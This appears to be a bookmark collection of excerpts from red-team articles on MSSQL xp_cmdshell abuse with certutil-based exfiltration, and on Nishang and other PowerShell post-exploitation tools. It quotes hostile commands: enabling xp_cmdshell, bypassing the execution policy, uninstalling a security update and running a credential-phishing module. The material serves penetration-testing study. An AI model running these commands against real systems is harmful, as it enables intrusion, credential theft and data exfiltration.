-
Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking
March 28, 2019 at 12:15:52 AM UTC - permalink -EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;The procedure to achieve it is as follows:
Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows). Dump the output of the command to the previous variable. Concatenate the rows of the table, separated by a line break. Encode the resulting string in Base64 and save it in a variable. Generate the certutil command, appending the string with the result. Execute it.- https://www.tarlogic.com/en/blog/red-team-tales-0x01/
-
-
-
-
Nishang: A Post-Exploitation Framework
February 20, 2019 at 11:00:59 PM UTC - permalink -Port-Scan
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”Remove-Update
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”Invoke-CredentialsPhish
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”- https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
-
Pwning the Enterprise With PowerShell
February 20, 2019 at 10:17:58 PM UTC - permalink -PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...- https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
-